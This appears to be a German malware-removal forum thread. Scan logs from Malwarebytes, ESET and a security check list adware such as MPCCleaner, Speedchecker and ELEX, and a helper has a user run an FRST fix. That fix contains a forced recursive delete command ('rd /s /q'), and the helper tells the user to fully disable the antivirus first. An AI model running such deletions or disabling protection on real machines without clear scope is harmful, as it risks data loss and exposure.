PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\js\content\search\search.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\reports\junitresults.xml, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\tests\unit\index.html, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\de\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages-sim.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\en_US\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\es\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\fr\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\it\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\abs@avira.com\_locales\pt_BR\messages.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\bootstrap.js, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\chrome.manifest, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\icon.png, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\install.rdf, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\search-settings.jsm, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-eme-adobe\12\eme-adobe.voucher, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.dll, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\gmp-gmpopenh264\1.5.1\gmpopenh264.info, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\healthreport\state.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\saved-telemetry-pings\eb83a39e-2542-4b9b-8f15-92b074184ca6, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\chrome\idb\2918063365piupsah.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\.metadata, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.FakeFFProfile, C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\webapps\webapps.json, In Quarantäne, [2580c8ea7821ba7cef0af9793fc6b14f],
PUP.Optional.CleanBrowser, C:\Windows\run.vbs, In Quarantäne, [168fd9d90e8bd3633d90333fcd3801ff],

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
ESET

Code:
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=init
# utc_time=2016-04-30 04:22:15
# local_time=2016-04-30 06:22:15 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 29317
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# end=updated
# utc_time=2016-04-30 04:25:26
# local_time=2016-04-30 06:25:26 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=4267ce6f66cc824991ec2ef4c0222f3f
# engine=29317
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2016-04-30 05:15:47
# local_time=2016-04-30 07:15:47 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.2.9200 NT
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 8767 15850690 0 0
# scanned=362877
# found=47
# cleaned=0
# scan_time=3020
sh=B00D7D54417F83530AB41C1D45CECB48DC796FCF ft=1 fh=e9dfcaac72e84e00 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinApi.dll"
sh=5ADCA9DD3BF59F20C0B0CBB12D35F2EF0849982A ft=1 fh=66c61548f23272de vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AdbWinUsbApi.dll"
sh=1A61B312A4C24359798ED1DCA279564AB10A4809 ft=1 fh=096b4dbafc5e1e8c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\AndriodServer.dll"
sh=9B3DB936D99C7E4068AB0EE40D01A3EA12F93516 ft=1 fh=7237caf261b5e620 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\BrowserPlugIn.dll"
sh=47B0D6CD29DDD112644FDBEEFC5FBA12BD4454F0 ft=1 fh=c1eed43ba38a9c9c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Cleaner.dll"
sh=523D9F4DD4F306213D7F391E5F09ED617AB8AC9E ft=1 fh=6ac48a109c808eae vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Database.dll"
sh=563CA7FA5E43EF24D45268B58AA2678C69D4979D ft=1 fh=538485d7e2a3acd4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LogReport.dll"
sh=43A933E2395C4A3C1A70EF0120B7F32FB614E15B ft=1 fh=7525d64b17104be4 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\LpcManager.dll"
sh=E50E257A2772B05ABDC5B1301348F3A7BCD31037 ft=1 fh=2b8d001a6e136e5f vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Monitor.dll"
sh=38AC9F35E07275308456A86AB74010ACFBE697C4 ft=1 fh=9c4a371b2e91dd7c vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe"
sh=D8369B07B0B92C86C7DECE8665EA79940841BA10 ft=1 fh=a8ac21aeacc5ea50 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll.dll"
sh=73D9CF58402E2A780E175B88518645DEC6FC4468 ft=1 fh=30e0ff1cd945f251 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MpcSafeDll64.dll"
sh=937836780BB991A61B3FC9EE896D85933B0B931F ft=1 fh=bde1161c33ed8972 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray.exe"
sh=803B51C4D42E07BB41210CD4E01DFC213C9901DA ft=1 fh=a69f57b34d489c4e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\MPCTray64.exe"
sh=1CADB36329505892F0578833C2910E84C716269E ft=1 fh=642d361fe7b3a003 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Report.dll"
sh=47BEF3747FF0703C5710E292DC6FA29E1739425F ft=1 fh=9a9663366bd79724 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi.dll"
sh=37CB7B8ECF1AC40532B00988BD3141724AEE6AA4 ft=1 fh=ebeadf3162756b74 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeNavi64.dll"
sh=1370B0833D91FA5D4734629896AD2A8A6BC7E66C ft=1 fh=496a06b43d427a62 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\SafeProtect.dll"
sh=53D8EE4FB02CAACC0253A6BFA01D309B437D7D20 ft=1 fh=c6a53c3acb635f13 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Support.dll"
sh=E0FC6B43F8FAC1C0D1037887E5EAF7B1F9C5F86A ft=1 fh=8749ca99a46fe69d vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\TrayFrame.dll"
sh=9FA4D99DE311E69F934643135F8EE32E44A98C41 ft=1 fh=ce96516d72baed57 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Update.dll"
sh=82C95690C090EC05FDE21F4372A8013DC9E7A281 ft=1 fh=4dee74180afd3662 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Utility.dll"
sh=86C97042F4A378EBA06C0F54D825F096B04CFC91 ft=1 fh=46ca724fc3cb0448 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Web.dll"
sh=F46740D4E2A0F7748FD7CACDFA827A93EE1E28C3 ft=1 fh=bb6779a801af24b3 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\WinService.dll"
sh=28EA52315FD6208C147068209C15A8CC69D2BFBE ft=1 fh=c1508f70874092d8 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XBus.dll"
sh=A53E3FDC66DD1978D4B1E8C589BD42AAF81EA52A ft=1 fh=d751568959b41da2 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XProcessBus.dll"
sh=73014EDE7B750F44B574947F3EDA1DB2BDB7344E ft=1 fh=b5af38d973c2376e vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\XSkin.dll"
sh=7BBA403FF536FCD057B03BC6C6DD60B30818E26F ft=1 fh=fbba1c879bfefdec vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCBase_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Win64/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt.sys"
sh=75862FCA547282A04952F2AD1235A86A244D5BF5 ft=1 fh=b37c7f3bc1f3bf89 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_32.sys"
sh=46D69A4DD532E91014B6362D705D2FF4B6F3E2C5 ft=1 fh=9496a9c4bbce9a83 vn="Win64/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_vista_64.sys"
sh=659F5A30DA39FEAE4B3EE7F0C40A24222AA3E27E ft=1 fh=4f1ab3efc78c0f94 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Drivers\MPCKpt_xp_32.sys"
sh=7FA3746CD92CF822FFA1D3AF4F0304655A7FA69F ft=1 fh=f7f39426f0cf8013 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Exe\ADC_qd00000.exe"
sh=27E6143704C268FD62E0184A7CFD9A5C3D2F411F ft=1 fh=975a97365d488128 vn="Variante von Win32/MPCCleaner.A evtl. unerwünschte Anwendung" ac=I fn="A:\Program Files (x86)\MPC Cleaner\Microsoft.VC90.CRT\msvcm90.dll"
sh=8C861BA6F67B5455E787744720E69BCBB26CE772 ft=1 fh=5a66b0f4caa7c850 vn="Variante von Win32/Speedchecker.B evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUSD.exe.vir"
sh=CDD586DF54134E12C80C4D432F3DDBDFABD5E58F ft=1 fh=0e6624e2656c8b93 vn="Variante von Win32/Speedchecker.C evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUService.exe.vir"
sh=9B1F08431B8B0B259516C077B3360B8ED9DFDA0D ft=1 fh=95fadfb541ab9fba vn="Variante von Win32/Speedchecker.E evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\pc speed up\PCSUUCC.exe.vir"
sh=FD837CAF99F57B70A0E2AA9CFE6CC57B93BB02BD ft=1 fh=3a5f7428b641ef39 vn="Variante von Win32/Obfuscated.NFU Trojaner" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\QQBrowser\Update\0AD0C687FD476CAE2DF5F47FFC66340E\Update\chrome_elf.dll.vir"
sh=F5521AE7653644E27EB15E6E59F207F5F2942757 ft=1 fh=585623a91aaa5c22 vn="Win32/ELEX.HV evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\ihpul.exe.vir"
sh=ADBC200F6EEABA9A36744339919BCA923ED9B16A ft=1 fh=c71c0011b7c271b9 vn="Variante von Win32/ELEX.HS evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\SearchesToYesbnd\wpm.exe.vir"
sh=754AE20F48D2621ECA30FF494813463E589D7ED0 ft=0 fh=0000000000000000 vn="Variante von Win32/Speedchecker.A evtl. unerwünschte Anwendung" ac=I fn="C:\AdwCleaner\FileQuarantine\C\Users\Harun\AppData\Local\Microsoft\Silverlight\OutOfBrowser\Speedchecker.PCSpeedUp\application.xap.vir"
sh=7E74FDF657B1A8803984F03AF74CD2D7DDAB620E ft=1 fh=46cd8c74ebc47fc9 vn="Variante von Win32/ELEX.HQ evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_update.dll"
sh=7BD40B943D61C6193BD584657363ECAD79BC3D3D ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\index.html"
sh=F338AF05B3C8FF9D60FB7FF772B2D9EE293353C9 ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\lib\jquery-2.1.0.min.js"
sh=66709C08173480EF5BC22ED8BF5CFD427276520B ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\module\mostgrid.js"
sh=827BD4E023C5CD9C32A65F39BE4F76B00879B8CB ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\common.js"
sh=BF187F6391DE04E413BDEA876241194418C2732A ft=0 fh=0000000000000000 vn="JS/Lightning.A evtl. unerwünschte Anwendung" ac=I fn="C:\FRST\Quarantine\C\Users\Harun\AppData\Roaming\ffgogogo\ffgogogo\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com\chrome\content\js\pack\xagainit.js"
Security Check

Code:
Results of screen317's Security Check version 1.009 
  x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
Windows Defender 
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 AVG PC TuneUp 
 Java 8 Update 51 
 Java version 32-bit out of Date!
 Mozilla Firefox (41.0.2)
 Google Chrome (49.0.2623.110)
 Google Chrome (49.0.2623.112)
````````Process Check: objlist.exe by Laurent```````` 
 Windows Defender MSMpEng.exe
 Malwarebytes Anti-Malware mbamservice.exe 
 Malwarebytes Anti-Malware mbam.exe 
 Malwarebytes Anti-Malware mbamscheduler.exe 
 Windows Defender MpCmdRun.exe 
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C:  %
````````````````````End of Log``````````````````````

cosinus 01.05.2016 20:28
Du hast ein altes MBAM Log gepostet. Nicht das vom letzten Scan.

StOony 01.05.2016 20:55
MBAM 1

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 01.05.2016
Suchlaufzeit: 21:49
Protokolldatei: MBAM 11.txt
Administrator: Ja

Version: 2.2.1.1043
Malware-Datenbank: v2016.05.01.04
Rootkit-Datenbank: v2016.04.17.01
Lizenz: Testversion
Malware-Schutz: Aktiviert
Schutz vor bösartigen Websites: Aktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: Harun

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 455884
Abgelaufene Zeit: 3 Min., 36 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Dateien: 0
(keine bösartigen Elemente erkannt)

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
MBAM 2

Code:
Malwarebytes Anti-Malware
www.malwarebytes.org


Update, 01.05.2016 02:01, SYSTEM, HARUN-PC, Scheduler, Malware Database, 2016.4.30.6, 2016.4.30.7,
Protection, 01.05.2016 02:01, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 01.05.2016 02:01, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 01.05.2016 02:01, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 01.05.2016 02:02, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 01.05.2016 02:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 01.05.2016 02:02, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 01.05.2016 14:22, SYSTEM, HARUN-PC, Scheduler, Domain Database, 2016.4.30.4, 2016.5.1.1,
Update, 01.05.2016 14:22, SYSTEM, HARUN-PC, Scheduler, Malware Database, 2016.4.30.7, 2016.5.1.2,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 01.05.2016 14:22, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Protection, 01.05.2016 15:22, SYSTEM, HARUN-PC, Protection, Malware Protection, Starting,
Protection, 01.05.2016 15:22, SYSTEM, HARUN-PC, Protection, Malware Protection, Started,
Protection, 01.05.2016 15:22, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 01.05.2016 15:23, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 01.05.2016 15:48, SYSTEM, HARUN-PC, Scheduler, Malware Database, 2016.5.1.2, 2016.5.1.3,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 01.05.2016 15:48, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Update, 01.05.2016 17:54, SYSTEM, HARUN-PC, Scheduler, Malware Database, 2016.5.1.3, 2016.5.1.4,
Protection, 01.05.2016 17:54, SYSTEM, HARUN-PC, Protection, Refresh, Starting,
Protection, 01.05.2016 17:54, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopping,
Protection, 01.05.2016 17:54, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Stopped,
Protection, 01.05.2016 17:55, SYSTEM, HARUN-PC, Protection, Refresh, Success,
Protection, 01.05.2016 17:55, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Starting,
Protection, 01.05.2016 17:55, SYSTEM, HARUN-PC, Protection, Malicious Website Protection, Started,
Scan, 01.05.2016 21:53, SYSTEM, HARUN-PC, Manual, Start: 01.05.2016 21:49, Dauer: 3 Min. 36 Sek., Bedrohungssuchlauf, Abgeschlossen, 0 Malware-Erkennung, 0 Nicht-Malware-Erkennungen,

(end)

cosinus 01.05.2016 21:22
FRST-Fix

Virenscanner jetzt bitte komplett deaktivieren, damit sichergestellt ist, dass der Fix sauber durchläuft!

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:
cmd: rd /s /q "A:\Program Files (x86)\MPC Cleaner"
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


StOony 01.05.2016 21:28
Fixlog

Code:
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-05-01 22:26:19) Run:8
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
cmd: rd /s /q "A:\Program Files (x86)\MPC Cleaner"
emptytemp:
       
*****************


=========  rd /s /q "A:\Program Files (x86)\MPC Cleaner" =========


========= Ende von CMD: =========

EmptyTemp: => 435.5 MB temporäre Dateien entfernt.


Das System musste neu gestartet werden.

==== Ende von Fixlog 22:26:21 ====
EDIT: Der Ordner ist jetzt endlich weg!

cosinus 01.05.2016 21:37
Zitat:
AVG PC TuneUp
Java 8 Update 51
Java version 32-bit out of Date!
Mozilla Firefox (41.0.2)
Google Chrome (49.0.2623.110)
AVG und Java bitte deinstallieren. Firefox und Chrome brauchen ein Update.


Sieht sonst soweit ok aus :daumenhoc

Ist dein System nun wieder in Ordnung oder gibt's noch andere Funde oder Probleme?

StOony 01.05.2016 21:43
Brauche ich Java nicht ?

Und was ist an AVG falsch ? Optimiert doch meinen Rechner ? oder ?

Dann hätte ich noch ein paar Fragen.

